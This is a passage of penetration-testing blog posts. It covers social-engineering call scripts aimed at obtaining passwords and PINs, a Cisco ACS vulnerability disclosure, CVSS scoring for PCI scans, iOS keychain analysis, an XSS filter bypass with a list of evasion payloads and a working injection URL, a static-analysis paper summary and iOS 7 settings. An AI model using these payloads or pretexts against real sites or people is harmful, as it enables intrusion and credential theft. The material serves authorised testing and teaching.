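  </FlowBlock>
</CallFlow>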

Objectives

Defining objectives is pretty straightforward:

<Objective>Login Username</Objective>
<Objective>Login Password</Objective>
<Objective>PIN</Objective>



CallBlocks

A CallBlock is effectively a container for an individual statement. These statements are then linked together within the FlowBlock below. Placeholders can be anything you'd like, as long as they're wrapped in brackets. FSFlow analyzes the flow on start up to populate the "Call Variables" pane.

<CallBlock name="Introduction">
<statement value="Hello [TARGETNAME], *PAUSE* My name is [CNAME] from [CROLE]"/>
</CallBlock>
<CallBlock name="Website Problems">
<statement value="I'm having trouble logging into the [WEBSITE] application. Can you help me? *PAUSE* [POC] told me to go to [URL] and login, but I get a strange error. *PAUSE* Can you login?"/>
</CallBlock>



The "Busted" Call block is a static value used throughout the call:

<CallBlock name="Busted">
<statement value="I'm sorry to bother you. Actually I work for Foundstone, a Division of McAfee. We were hired by your company to perform 'Social Engineering' testing. You can contact [POC] if you need to confirm this. Since I'm conducting this testing, I'd ask that you don't tell your coworkers"/>
</CallBlock>



FlowBlocks

The FlowBlock links together individual CallBlocks and ties them to buttons.

<FlowBlock name="FlowBlock1">
<CallBlockFlow value="Caller Pickup">
<PositiveResponse value="Introduction"/>
<NegativeResponse value="No Answer"/>
<RecoveryResponse value="Recovery Response"/>
</CallBlockFlow>
</FlowBlock>



Todo

The biggest thing that we need to do now is develop solid CallFlows; without them, it's really hard to judge exactly how successful this will be! If you have an idea for a flow, let me know!

Download

You can download FSFlow now!

Have any other ideas? Let us know in the comments below!



Note: Image above is from here

Remote Code Execution on Wired-side Servers over Unauthenticated Wireless

By Brad Antoniewicz.

TL;DR - There's a remote code execution vulnerability that can be exploited via 802.11 wireless to compromise a wired side server. The attacker needs no prior knowledge of the wireless network or authenticated access in order to exploit. Check out the video below to see the exploit in action over a wireless network:



Some Background Info

IEEE 802.1x is a standard that describes a way to authenticate users before they "connect" to a network. This happens at layer 2, before the system is assigned an IP address. Basically, the connecting system (supplicant) communicates via a switch or access point (authenticator) to a back end RADIUS server (authentication server). The supplicant and authentication server communicate using EAP to exchange authentication messages. If all goes well and the user is properly authenticated, the Authentication server sends an "EAP-Success" which prompts the authenticator to allow the user onto the network.

In wired networks, this all happens after the user plugs in their Ethernet cable, while in wireless networks implementing WPA Enterprise, this happens after the standard 802.11 session establishment.



The bottom line is that in both wired and wireless networks the unauthenticated user communicates with the authentication server.

Vulnerability Details

Probably the most important thing to point out is that the remote code execution vulnerability I discovered is in an older version of Cisco Secure Access Control Server (ACS). It's possible that it may be present in newer versions which Cisco is investigating under case PSIRT-1771844416 and bugID CSCui57636.

The vulnerability can be triggered before the user is authenticated, which means that in the case of a wireless network running WPA Enterprise, an attacker just needs to be in the physical proximity of the wireless network to fully compromise the ACS server.

Although there is a communication channel between the attacker and the authentication server when the vulnerability is triggered, it's very difficult to leverage this channel as part of post-exploitation activities. It's more realistic that an attacker would use this vulnerability to establish a reverse shell back via the internet. It may also be possible to redirect the execution flow to result in an "EAP-Success" message (or countless other functions). The video above simply demonstrates code execution. Note that in the video the presence of the wired connection between the authentication server and the attacker is there to show the observer path (how the video was recorded) and the potential reverse shell path; in the case of WPA Enterprise, no wired access is required by the attacker to exploit the vulnerability.

Impact

Besides the obvious impact concerns (e.g. system compromise), authentication servers are particularly sensitive systems. They're usually on privileged network segments, integrated with Active Directory, and can be responsible for VPN authentication. ACS in particular also supports TACACS which could allow an attacker to compromise network devices such as routers, switches and firewalls. For an attacker, compromising the authentication server is a very strong foothold into the environment.

Further Information

As mentioned, Cisco is currently investigating this vulnerability. They've been provided a full working exploit and have been extremely responsive and accommodating thus far. The exploit or any further details will not be publicly released until Cisco has had enough time to determine the full extent of the vulnerability. Stay tuned!

Follow me on twitter - @brad_anton



Accurate CVSS Scoring in PCI ASV Scans

By Vijay Agarwal.

Payment Card Industry (PCI) vulnerability scanning involves having an Approved Scanning Vendor (ASV) perform a vulnerability scan, as per PCI DSS requirement 11.2, on all IP addresses/devices that store, process or transmit credit card data. The scan aims to identify both network and web application vulnerabilities. The PCI guidelines detail the process by which these scans should be conducted, so we won't go into the details of that. Instead, we'll discuss how risk is analyzed and rated once a vulnerability is identified.

Risk Ratings

In PCI ASV reports, risks are calculated based on the Common Vulnerability Scoring System (CVSS2), which is the de facto scoring standard adopted and well accepted throughout the security industry for calculating security risk.

The basic rule of thumb for calculating the risk: if the CVSS2 score is >= 4.0, that particular vulnerability will result in non-compliance with PCI and the affected device/IP will be marked as FAILED. A CVSS2 score <= 3.9 leaves the vulnerability compliant with PCI.

We have mapped the various risk levels and the CVSS2 scores to help you understand how vulnerabilities are rated.

CVSS2 Score          Risk      Compliance Status
< 4.0                LOW       PASS
>= 4.0 and <= 6.9    MEDIUM    FAIL
>= 7.0 and <= 10     HIGH      FAIL

References:



It should now be clear from the above table how vulnerabilities are classified based on their CVSS2 score as per the PCI ASV Council, but there is still a lot of calculation, analysis and verification to be done; there are various scenarios/cases where we need to calculate the CVSS2 score carefully based on the circumstances.

In the next few sections let’s analyze a few scenarios I have come across when conducting PCI ASV scans.

Case 1 - Self-Signed Certificate

Let’s calculate the CVSS2 score for a vulnerability where the scanner has flagged an application using a self-signed certificate as a medium risk issue. The following are the CVSS2 parameters to be used; the resulting score determines how the risk is rated and how the PCI compliance status is analyzed.

Exploitability Metrics

Metric               Value               Justification
Access Vector        Adjacent Network    The system can be accessed from any remote network by any system
Access Complexity    Medium              Requires little skill or additional information gathering
Authentication       None                No authentication is required to exploit this flaw or get access to the authentication environment

Impact Metrics

Metric                    Value      Justification
Confidentiality Impact    Partial    There is considerable information disclosure but the attacker has no control
Integrity Impact          Partial    Traffic can be altered once the flaw is exploited
Availability Impact       None       No impact to the availability of the system



Risk will be rated as Medium and this vulnerability will result in a PCI compliance status of FAIL.

Case 2 - Special Case Self-Signed Certificate

Now let’s assume there is a slight change in the environment for the same vulnerability, and the following information was provided by the PCI scan client: the affected system has restricted access and is not available publicly; access is controlled using an IPS/IDS and user IPs are whitelisted. The input parameters change as follows when calculating the CVSS2 score under these conditions.

Exploitability Metrics

Metric               Value               Justification
Access Vector        Adjacent Network    Requires local network access - which accounts for the white-listed IP address
Access Complexity    High                Specialized access conditions exist
Authentication       None                No authentication is required to exploit this flaw or get access to the authentication environment

Impact Metrics

Metric                    Value      Justification
Confidentiality Impact    Partial    There is considerable information disclosure but the attacker has no control
Integrity Impact          Partial    Traffic can be altered once the flaw is exploited
Availability Impact       None       No impact to the availability of the system



Risk will be rated as Low and this vulnerability will result in a PCI compliance status of PASS. So a slight change in the environment and accessibility has changed the risk for the issue.
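If you want to sanity-check ratings like these yourself, the CVSS v2 base equation is easy to code up. The sketch below uses the weight constants from the CVSS v2 specification and plugs in Case 2's metrics (Adjacent Network / High / None and Partial / Partial / None), which should land below the 4.0 PCI threshold:

/* build: gcc cvss2_check.c -o cvss2_check -lm */
#include <math.h>
#include <stdio.h>

/* CVSS v2 base score; arguments are the metric weights from the spec:
   AV: Local 0.395, Adjacent 0.646, Network 1.0
   AC: High 0.35, Medium 0.61, Low 0.71
   Au: Multiple 0.45, Single 0.56, None 0.704
   C/I/A: None 0.0, Partial 0.275, Complete 0.660 */
static double cvss2_base(double av, double ac, double au,
                         double c, double i, double a)
{
    double impact = 10.41 * (1.0 - (1.0 - c) * (1.0 - i) * (1.0 - a));
    double exploitability = 20.0 * av * ac * au;
    double f_impact = (impact == 0.0) ? 0.0 : 1.176;
    double score = ((0.6 * impact) + (0.4 * exploitability) - 1.5) * f_impact;
    return round(score * 10.0) / 10.0;   /* round to one decimal place */
}

int main(void)
{
    /* Case 2: AV:Adjacent AC:High Au:None / C:Partial I:Partial A:None */
    double score = cvss2_base(0.646, 0.35, 0.704, 0.275, 0.275, 0.0);

    printf("CVSS2 base score: %.1f -> %s\n", score,
           score >= 4.0 ? "FAIL (non-compliant)" : "PASS");
    return 0;
}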

Case 3 - Multiple Server Vulnerabilities

Let’s calculate the CVSS2 score for a vulnerability where the scanner has flagged a server affected by multiple vulnerabilities, which is a high risk issue. The following are the CVSS2 parameters to be used; the resulting score determines how the risk is rated and how the PCI compliance status is analyzed.

Exploitability Metrics

Metric               Value      Justification
Access Vector        Network    The system can be accessed from any remote network
Access Complexity    Medium     Requires little skill and information gathering
Authentication       None       No authentication is required to exploit this flaw or get access to the authentication environment

Impact Metrics

Metric                    Value      Justification
Confidentiality Impact    Partial    There is considerable information disclosure but the attacker has no control
Integrity Impact          Partial    Traffic can be altered once the flaw is exploited
Availability Impact       Partial    Reduced performance or interruptions in resource availability



Risk will be rated as High and this vulnerability will result in a PCI compliance status of FAIL.

Case 4 - Special Case Multiple Server Vulnerabilities

Now let’s assume there is a slight change in the environment for the same vulnerability, and the following information was provided by the PCI scan client: the affected system has restricted access and is not available publicly; access is controlled using an IPS/IDS and user IPs are whitelisted. We'll change the following while calculating the CVSS2 score under these conditions.

Exploitability Metrics

Metric               Value      Justification
Access Vector        Network    Requires network access - which accounts for the white-listed IP address
Access Complexity    High       Specialized access conditions exist
Authentication       None       Authentication may not be required.

Impact Metrics

Metric                    Value      Justification
Confidentiality Impact    Partial    There is considerable information disclosure but the attacker has no control
Integrity Impact          Partial    Modification of some system files or information is possible
Availability Impact       Partial    Reduced performance or interruptions in resource availability



Risk will be rated as Medium based on the new CVSS2 score, but this vulnerability will still result in a PCI compliance status of FAIL.

Case 5 - Multiple Server Vulnerabilities in Unused Functionality

Now let’s assume more information about the same vulnerability is provided to us by the client, saying:

The affected server modules on which the vulnerabilities have been reported are not being used by the application or the server and the system is not publicly accessible

This is a special case where the client confirms that the affected server modules are not being used. This indicates that the vulnerability cannot currently be exploited, so the risk can be moved from medium to low, keeping the default CVSS2 score and adding a note like the one below.

Note: This issue is moved to low since the affected vulnerable modules of the server are not being used. It is advised that the reported unused modules be removed from the server, since they would result in a high risk vulnerability if they are implemented or used in the future.

Risk can now be rated as Low based on the note and the information provided by the client, and this vulnerability will result in a PCI compliance status of PASS.

Additional Tips and Suggestions

  1. Most of the vulnerability scanning tools provide a CVSS2 score with each vulnerability. Sometimes these scores may be wrong, so it’s best to review and validate them before finalizing the risk.
  2. If a CVSS2 score is not present for a vulnerability, it should be calculated manually using the CVSS2 calculator and the appropriate risk finalized.
  3. The right parameters should be used while calculating the risk; wrong parameters may result in a wrong score and a wrong compliance status.
  4. If the vendor has a compensating control for the vulnerability, a new CVSS2 score should be calculated taking that control into account, which may reduce the risk.
  5. As per PCI ASV, DoS vulnerabilities will be rated per the rule below:

    In case of denial-of-service vulnerabilities, where the vulnerability has both a CVSS2 Confidentiality Impact=none and a CVSS2 Integrity Impact=none, the vulnerability must be marked as pass and must be rated as low risk.


Hope this helps!

Analyzing Keychain Contents with iOSKeychain Analyzer

By Neelay Shah.

iOS exposes a secure storage facility, the "Keychain", which can be used by applications to securely store critical and security sensitive data such as symmetric keys, asymmetric private keys, certificates, usernames, passwords, etc. As part of penetration testing iOS applications it is often necessary to be able to inspect the contents of this keychain to identify what the application is storing in the keychain and how it is potentially using it. A common example is to use the Keychain to store the login username and password so that the user is logged in seamlessly when the application is launched. The iOS simulator simulates this Keychain as a SQLite database. However, this SQLite database is encrypted and as such opening it does not help much.

iOSKeychain Analyzer extracts and exports the contents of the keychain (on the iOS simulator) along with the associated attributes/properties. The types of keychain items range from passwords, certificates to keys. The attributes for these keychain items include details such as clear text values, accessibility details, description/comments, creation/modification etc. Additionally, the tool also analyzes the iOS simulator keychain contents from a security standpoint.

Download

You can find the Binary here:

and the Source code here:

Installation / Pre-Requisites

The source code should compile successfully on Mac OS X 10.7.4/Xcode 4.4.1/iOS SDK 5.0. Once compiled, you can run it on an iOS 5.0/5.1 simulator. Though not tested, the code should compile and run fine on a more recent platform/environment than this.

A compiled binary is provided for the iPhone 5.1 Simulator. To use this binary as is, copy the "01EFB1DB-4A47-45A1-B692-F88996FAC4F8" folder to "/Users/[Username]/Library/Application Support/iPhone Simulator/5.1/Applications". Then launch the iOS Simulator. Set the device to iPhone and version 5.1 and the application should appear installed on the simulator. You can then launch it from there.

The data export/report files should open fine in Safari 6.0+, Firefox 17.0+ and Chrome 23.0.1271.101+

Usage

First install and configure the application that you are testing within the iOS simulator. If iOS Keychain Analyzer is not installed within the simulator then install it. See the "Installation / Pre-Requisites" section for instructions on how to install the tool.

Next, launch the iOS Keychain Analyzer and you'll be presented with the following page:



First export the data:



Then analyze it:



It'll create the Library/Caches/DataAndAnalysisReports (e.g. /Users/[Username]/Library/Application Support/iPhone Simulator/5.1/Applications/01EFB1DB-4A47-45A1-B692-F88996FAC4F8/Library/Caches/DataAndAnalysisReports/) folder to store the results.

Within the folder are two reports:

  1. iOSKeychainDataViewer.htm - This report displays the entire contents of the keychain in a readable format. The raw keychain contents are stored in JSONP format in the "KeychainDataExport.jsonp" file
  2. iOSKeychainAnalysisReportViewer.htm - This report displays the keychain data analysis report in a readable format. The raw analysis report can be found in the "KeychainAnalysisReport.jsonp" file


Analyzing Keychain Contents

iOSKeychain Analyzer runs the following checks:

  1. Weak Password Check - All password items that have a length of less than 8 characters, are not alphanumeric, or do not contain a special character are flagged (a rough sketch of this check appears after the list)
  2. Weak Authentication Method Check - All password items that are configured to be used with weak authentication methods such as HTTP Basic and HTTP Digest are flagged
  3. Weak Protocol Check - All passwords that are configured to use insecure protocols such as HTTP, FTP etc. are flagged
  4. Weak Key Length Check - All symmetric keys with key length less than 128 bits and all asymmetric keys with key length less than 1024 bits are flagged
  5. Insecure Accessibility Check - All items that can be accessed insecurely (irrespective of whether the device is locked or not) are flagged
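For illustration, one way to read check #1 in plain C (the actual tool is written in Objective-C, so this is only a sketch of the logic):

#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Sketch of the weak-password check: flag passwords shorter than 8 characters,
   passwords that don't mix letters and digits, or passwords with no special
   character. */
static bool is_weak_password(const char *pw)
{
    bool has_alpha = false, has_digit = false, has_special = false;
    const char *p;

    if (strlen(pw) < 8)
        return true;

    for (p = pw; *p; p++) {
        if (isalpha((unsigned char)*p))
            has_alpha = true;
        else if (isdigit((unsigned char)*p))
            has_digit = true;
        else
            has_special = true;
    }
    return !(has_alpha && has_digit && has_special);
}

int main(void)
{
    printf("%d\n", is_weak_password("Passw0rd!"));   /* 0: not flagged */
    printf("%d\n", is_weak_password("password"));    /* 1: flagged     */
    return 0;
}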


Known Issues

The tool does not export the clear text public key or private key. The reason is that the API exposes the opaque public/private key structure but not the actual bytes.


Bypassing XSS Mitigations with HTTP Parameter Pollution

By Piyush Mittal.

HTTP Parameter Pollution is overriding or adding HTTP GET/POST parameters by injecting query string delimiters. Basically, the attacker sends the same parameter multiple times to affect the application. This can also be exploited by specifying a new random parameter and adding it to the request. The server may combine the values of the duplicate parameter or reject one of the two values. The following table summarizes the known behaviors in different web servers:


from Luca Carettoni's and Stefano di Paola's presentation at OWASP EU09

Vulnerable Request

I was recently looking at an application that appeared to be vulnerable to cross-site scripting since it was possible to inject <, >, ", ;, etc., but something (a web application firewall or blacklisting) would strip HTML tags and attributes. From here on out, we'll refer to anything that might be doing filtering as "mitigations". The vulnerability was in the "category" parameter sent within a POST request to "search.htm":


POST /search.htm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

category=



Whenever any sort of HTML tag was provided to the category parameter, the application would redirect the user to an error page that referenced OWASP:


HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 Sep 2013 02:12:58 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA/Tomcat-5.5
Content-Length: 0
Location: https://www.somesite.com/error.html?code=OWASP
Connection: keep-alive
Content-Type: text/html; charset=UTF-8




POST to GET

It's surprising how many mitigations can be bypassed right out of the box by simply changing the request from a POST to a GET (or vice versa). Unfortunately, for this exercise, changing the request method did not work. However, the application supported it, which made exploitation easier.

Traditional Bypass

First I tried the standard filter evasion techniques with different payloads, tags, and attributes. Here's a list of attempts that were all blocked:

  • "onclick
  • "ondblclick
  • "onmousedown
  • "onmousemove
  • "onmouseover
  • "onmouseout
  • "onmouseup
  • "onkeydown
  • "onkeypress
  • "onkeyup
  • "onabort
  • "onerror
  • "onload
  • "onresize
  • "onscroll
  • "onunload
  • "onsubmit
  • "onblur
  • "onchange
  • "onfocus
  • "onreset
  • "onselect
  • "><ScRiPt>
  • "><SCRIPT>
  • "><script//
  • "><script/**/
  • "><script+
  • "><script%20
  • "><script
  • "><%73%63%72%69%70%74>
  • "><<script>>
  • "><s/**/c/**/r/**/i/**/p/**/t>
  • "><s//c//r//i//p//t>
  • "><s+c+r+i+p+t>
  • "><s%20c%20r%20i%20p%20t>
  • "><%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74>
  • <object
  • <div
  • <img
  • <a

HPP as a Bypass

As you may have guessed, by simply specifying the category parameter twice, it was possible to completely bypass the mitigation. The second instance of the parameter was ignored by the mitigation, but at the server both parameters were combined, allowing the script injection!

Here's the final URL:


search.htm?category=&category="><script>alert('reflected%20xss')</script>
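
The exact combining behavior depends on the backend, as the table above shows, but the underlying duplicate-parameter ambiguity is easy to demonstrate with any query-string parser. Here's a quick Python illustration (my own, not part of the exploit; the "jackets" value is just a made-up legitimate parameter):

from urllib.parse import parse_qs

qs = 'category=jackets&category=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'

# parse_qs keeps every occurrence of a duplicated parameter...
print(parse_qs(qs)['category'])
# ['jackets', '"><script>alert(1)</script>']

# ...while code that expects a single value might take the first, the last,
# or a joined string - which is exactly the gap HPP abuses.
first, last = parse_qs(qs)['category'][0], parse_qs(qs)['category'][-1]
print(first, last)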



Validating Custom Sanitization in Web Applications with Saner

By Gursev Singh Kalra.

I recently read a paper in which the authors combined static and dynamic source code review techniques to evaluate the effectiveness of custom-built data sanitization routines in PHP based web applications. The paper was very interesting and I thought I'd summarize it for quick consumption.

The authors suggest that static analysis systems are not able to analyze custom sanitization routines and often report security vulnerabilities even when custom routines effectively neutralize malicious characters. The reported vulnerabilities are then subjected to manual analysis, which is error prone and often yields inaccurate results (false positives or negatives).

As part of their research, the authors wrote Saner with the objective of analyzing custom sanitization routines to identify XSS and SQL injection vulnerabilities in web applications. Saner combines static and dynamic analysis techniques, which resulted in low false positive rates and the ability to identify the exact attack vectors that could bypass the custom sanitization code. It is based on Pixy, an open source web vulnerability scanner for PHP.

Let us look at the two phases employed by Saner.



Static Analysis

There are two types of static analysis models: sound and unsound. The sound model flags custom sanitization routines as ineffective, while the unsound model assumes that string manipulation operations on tainted input result in untainted output. The sound model can produce a large number of false positives and the unsound model may lead to false negatives.

Pixy provides the data flow analysis between sources and sensitive sinks and identifies whether any built-in sanitization routines are applied to the identified data flow paths. Pixy follows the sound analysis model: it flags custom sanitization routines as ineffective, which results in high false positive rates. Additionally, program variables in Pixy can only be tainted or untainted, so Pixy cannot capture the set of values each variable can hold.

To address these shortcomings, Pixy was extended to derive an over-approximation of the values that program variables can hold at every point in the program. The extension is based on finite state automata that describe arbitrary sets of strings, with taint qualifiers associated to the automata transitions. This gave Saner the ability to track the taint status of different parts of a string.

Saner performs postorder traversal on Pixy’s dependency graphs to derive the automata that describe the possible string values a program node can contain. The node can be a) a string, b) a variable or c) an operation. When a node represents a string literal, it is decorated with an automaton that describes the exact string. The automaton for program variables is calculated based on the successor nodes from the dependency graph.

Saner categorizes operations into two groups. The first group contains the functions that are precisely modeled, i.e. Saner uses finite state transducers to compute an automaton that describes all possible output strings from this category of functions. The Saner team developed a number of finite state transducers for custom string manipulation functions as well as the functions that are commonly used for input sanitization. This is required to precisely capture the effect of the sanitization routines. The second group consists of un-modeled functions, where Saner depends on the values passed to the parameters of these functions and computes the automaton based on the least upper bound of the taint status of the supplied parameters.

Saner uses Mohri and Sproat's algorithm to model the functions. The automata used in Mohri and Sproat's algorithm are not taint aware. To get around this limitation, the algorithm was left unmodified and a clever workaround was used to leverage the existing algorithm to propagate taint information. The workaround replaced static strings with empty ones to ensure that static, untainted strings that contain dangerous meta-characters do not lead to false positives. To compensate for the loss of information from static string removal, an over-approximation of possible string values was derived based on the various modeled functions and the parameters they accept. This approach allowed removal of false negatives.

Finally, in order to determine if a potentially malicious input makes it to a sensitive sink, an intersection is calculated between the automaton that represents the sink’s input and the automaton that contains the set of undesired characters. For every non-empty intersection, the source-sink pair is flagged as a potential true positive and the information is passed to the dynamic analysis phase.
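
To make that intersection step concrete, here is a deliberately over-simplified model in Python. It uses plain character sets instead of Saner's taint-annotated automata and is my own sketch, not code from the paper:

# Simplified model of the final static-analysis step: intersect the set of
# characters a sink can receive with the set of "undesired" characters.
# Saner does this over finite state automata; sets are enough to show the idea.

def possible_chars_after_sanitizer(tainted_input, sanitizer):
    return set(sanitizer(tainted_input))

def flag_sink(sink_chars, undesired=frozenset('<>"\'')):
    # Non-empty intersection => potential true positive, hand to dynamic phase
    return bool(sink_chars & undesired)

weak = lambda s: s.replace('<script>', '')        # naive, bypassable "sanitizer"
strong = lambda s: ''.join(c for c in s if c.isalnum())

attack = '<scr<script>ipt>alert("x")</script>'
print(flag_sink(possible_chars_after_sanitizer(attack, weak)))    # True
print(flag_sink(possible_chars_after_sanitizer(attack, strong)))  # False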

The following image summarizes the static analysis phase:



Dynamic Analysis

The static phase is conservative and may generate false positives, which would normally require developers to manually inspect the code to weed them out. The dynamic analysis component attempts to automate this analysis by directly executing the custom sanitization routines on a set of malicious inputs and then analyzing the output to determine whether the malicious characters were sanitized.

After receiving the source-sink pairs from the static analysis component, the dynamic analysis extracts all the nodes pertinent to the custom data sanitization and abstracts out all the other application details. It then calculates a sanitization graph for each source-sink pair and uses that information to construct all possible paths from source to sink.

Based on the type of the sink, a test suite (XSS or SQL injection) is selected for evaluation. For example, if the sink forms a portion of a SQL query, the SQL injection test suite is run against the corresponding data flow paths. The final step of the process invokes the PHP interpreter to evaluate the result of executing each block of code with the corresponding test suite.

The results of each test are then analyzed by an oracle function that checks for the occurrence of particular substrings, and each result is categorized as a true positive or a false positive.
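
A minimal version of such an oracle might look like the following sketch (my own; the marker strings are assumed stand-ins for whatever the active test suite injects):

def oracle(rendered_output, markers):
    """Return True if any attack marker from the test suite survived
    the sanitization routine (i.e. the case is a true positive)."""
    out = rendered_output.lower()
    return any(m.lower() in out for m in markers)

xss_markers = ['<script', 'onerror=']                            # assumed markers
print(oracle('Hello &lt;script&gt;', xss_markers))               # False - neutralized
print(oracle('Hello <script>alert(1)</script>', xss_markers))    # True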

The following image summarizes the dynamic analysis phase:



Results

Saner identified 13 novel vulnerabilities across five open source PHP applications. The time required to perform the analysis was on the order of a few minutes for almost all applications.

Observations

  1. Saner’s dynamic analysis effectiveness is primarily driven by its input test suite, which is limited. The whitepaper does not discuss any mutation engines used for the attack vectors; an intelligent mutation engine could potentially make the tool more effective. Additionally, the tool was written to identify XSS vectors that rely on the < symbol, so including other XSS injection techniques could also increase the detection rate.
  2. The interesting custom validation bypass attacks that Saner identified and discussed in the paper were Cross-Site Scripting attacks; the authors did not discuss any identified SQL injection vulnerabilities.
  3. The dynamic analysis component can also be leveraged to write unit test cases for PHP web applications. I could not find Saner source code and plan to reach out to the authors to check its availability.


iOS 7 Security Settings and Recommendations

By Kunjan Shah.

Apple finally released the much anticipated iOS 7 last Wednesday, September 18th. A lot of people are rushing to update to this latest version; it hit 18% adoption within just 24 hours of its release. I gotta admit, I love the look and feel of it and it feels like a completely new phone in my hand. In this blog post I explain some of the new and modified security settings and features that you should be aware of before you move to iOS 7.

Recent Hacks

iOS 7 Lock Screen Bypass Flaw

Just one day after its release, an iOS 7 lock screen bypass flaw was identified by a user, as shown in this video. I tried it out on my iPhone 5 running iOS 7 and it is a fairly simple trick. This follows a similar flaw that was identified in the iOS 7 beta some time back. Maybe a good reason not to jump to iOS 7 right away? Until an official fix is released by Apple, you can disable access to the Control Center from the locked screen as discussed below.

Yet another bug allows an attacker to bypass the lock screen and make calls.

Siri Abuse to Post Facebook Updates

Siri gains more power in iOS 7, maybe too much power. This vulnerability showed that while certain Siri commands are restricted (disallowing the user from posting to Facebook), there are alternate commands that accomplish the same task but are unrestricted.

Apple TouchID Bypass and Drama

The latest iPhone models include a fingerprint reader called TouchID. The intention behind this addition was in the right place, but as shown by the CCC, fingerprints should not be used as a security identifier. Hacking TouchID got tons of attention from the security community due to a crowd-funding venture; however, it appears that a fraudster named Arturas Rosenbacher took much of the credit for the venture, made false promises, and never paid up, creating a little drama in the industry.

Notification Center

Notification Center, which was first introduced with iOS 5, gets a facelift in iOS 7. One of the key security distinctions this time around is that you can now access Notification Center from the locked screen. Notification Center is a hub of information ranging from calendar entries, reminders, and stocks to missed calls and messages. Unless you have a very good reason to keep it accessible from the locked screen, I recommend disabling it there. To disable it, navigate to Settings > Notification Center and toggle “Notification View” and “Today View” off as shown below.



Control Center

With iOS 7 Apple has introduced Control Center, which lets you access frequently used settings by swiping up from the bottom of the screen. This feature, like Notification Center, is accessible from the locked screen by default. It lets you modify settings such as Wi-Fi, Bluetooth, Airplane Mode, Airdrop, etc. Again, it is recommended that you disable this feature from the locked screen. As shown in this video, having Control Center accessible on a locked device can let anyone in possession of your iPhone bypass the lock screen completely. This is another very good reason to disable access to it from the locked screen.

You can disable it from under Settings > Control Center. Toggle “Access on Lock Screen” to off as shown in the figure below.



Airdrop

With OS X Lion Apple introduced a peer-to-peer file sharing feature called Airdrop for Mac users. This feature is now also available to iOS 7 users on iPhone 5 models. It lets you transfer maps, pictures, and videos over Wi-Fi and Bluetooth to other users in close proximity. One of the settings for Airdrop lets you choose whether your iPhone is discoverable by everyone or just your contacts. It is recommended that you select “Contacts Only” as it is a safer alternative than “Everyone”, unless you want to receive file sharing requests from anonymous people around you.



Powerful New Siri

iOS 7 introduces a more powerful version of Siri with additional commands that let you change settings on the fly from the locked screen, such as “Enable Bluetooth” or “Turn on Airplane Mode”. You can also find recent tweets, post on Facebook, read and reply to new messages, view missed calls, and listen to voice messages from the locked screen using Siri.



It is recommended that you disable access to Siri from a locked screen. To do so, go to Settings > General > Passcode Lock and disable Siri and other settings as shown in the figure below.



Activation Lock

This is one of the nicest security features that Apple has introduced with iOS 7. In an attempt to prevent thieves from reselling stolen iPhones by just resetting them and swapping the SIM card, Apple introduced “Activation Lock” to augment its Find My iPhone service. This feature prevents someone from erasing all the data and re-activating the device, or turning Find My iPhone off, without entering the Apple ID and password first. When you first upgrade to iOS 7, Apple asks for your Apple ID to enable this feature. To enable it at a later stage, simply go to Settings > iCloud and toggle the Find My iPhone setting to on. To read more about this topic, visit this post.



Privacy Controls in iOS 7

Microphone (New Feature)

iOS 7 now asks for the user’s permission if an application intends to access the microphone. In previous versions of iOS, permissions were limited to contacts, calendars, photos, etc. This is a nice new privacy control. You can see which apps have been authorized to access the microphone and revoke access by going to Settings > Privacy > Microphone.



Private Browsing Button (Re-designed)

The “Private” browsing setting has been moved out of Settings and is now more easily available within Safari. You can enable “Private” browsing by navigating to bookmarks in Safari and tapping the “Private” button in the bottom left corner. Moreover, you can also ask sites not to track you by enabling the “Do Not Track” option under Settings > Safari.



Limit Ad Tracking (Re-designed)

This feature lets you limit ad tracking and reset your device’s “Advertising Identifier”. This prevents companies from sending you targeted advertisements through a unique tracking number tied to your device. To enable this option go to Settings > Privacy > Limit Ad Tracking and turn it on as shown below.



Frequent Locations

When you first upgrade to iOS 7 it asks you if you want to remember places that you frequently visit. If you opt in, the Frequent Locations setting saves this information and transmits it anonymously to Apple to improve Maps. It is no surprise that the iPhone keeps track of places you frequently visit if you followed the Location-gate fiasco that unfolded in 2011, when a database of Wi-Fi hotspots was discovered on iOS 4 devices. However, Apple is now being more transparent about it and provides an option for users to opt in. The good thing is that this is turned off by default in iOS 7, and according to Apple it is no longer a developer-only setting but a consumer feature. If you opt in by mistake and want to opt out, go to Settings > Privacy > Location Services, scroll down to System Services at the bottom of the screen, and toggle Frequent Locations to off.

In addition to this, I recommend turning off the “Diagnostics & Usage” and “Location-Based iAds” settings as well. The Diagnostics & Usage setting monitors what you do on your device and anonymously sends it to Apple for improving iOS. iAds caused a lot of noise in 2010 when Apple published its long privacy policy. The bottom line is that if you don’t care about targeted ads, you should probably disable this.



Blocking Contacts (New Feature)

With iOS 7 you now have the ability to block contacts for phone calls, iMessage, and FaceTime. To block someone, go to Settings > Messages or FaceTime and scroll down to “Blocked”. From here you will be able to add the contacts that you want blocked, as shown below.



References

  1. http://www.macworld.com/article/2048738/get-to-know-ios-7-changes-in-the-settings-app.html
  2. http://blogs.wsj.com/digits/2013/09/18/how-to-use-apples-new-ios-7-privacy-controls/
  3. http://www.pcmag.com/article2/0,2817,2423635,00.asp
  4. http://www.buzzfeed.com/charliewarzel/this-is-what-it-looks-like-when-your-phone-tracks-your-every
  5. http://resources.infosecinstitute.com/ios-application-security-part-6-new-security-features-in-ios-7/
  6. http://www.idownloadblog.com/2013/08/08/a-closer-look-at-frequent-locations-in-ios-7/


Getting a Grip on Your Cuckoo Reports

By Melissa Augustine.

I recently had a forensics case where I had to test a lot of files for malicious behavior. “No problem!” I thought, “I can just use my watcher script to automatically push all 50 files to my cuckoo instance... I'll just sit back and watch the CPUs crunch by...”

That was all well and good... until I realized I needed to go through the 50 reports manually to look for suspicious behavior.

Not cool.

I like how on malwr.com (the online instance of Cuckoo), if you have an account, you can get a quick summary of all your submissions: filename, antivirus detections, file type, and so on.

And I wondered if I could create such a thing for my personal Cuckoo Sandbox at home... and so the Cuckoo Scraper Script was born!

Cuckoo Scraper Script

Download:

Prerequisites:
